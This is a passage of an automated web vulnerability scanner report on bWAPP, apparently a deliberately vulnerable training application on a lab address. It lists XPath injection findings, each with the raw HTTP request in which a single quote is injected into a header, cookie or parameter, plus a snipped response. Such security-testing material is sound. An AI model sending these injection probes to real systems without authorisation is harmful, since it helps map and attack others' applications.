Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:45 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.52. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:38 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.53. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [admin cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:07:48 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.54. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:06 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.55. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:07:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.56. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:07:26 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13438

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.57. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [Base64-decoded value of the secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.58. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:50 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.59. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:41 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.60. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [admin cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:45 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.61. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:08 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.62. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [form_bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:18 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.63. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [form_security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:18 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.64. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [movie_genre cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The movie_genre cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the movie_genre cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.65. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:23 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.66. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [name of an arbitrarily supplied body parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:14 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.67. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
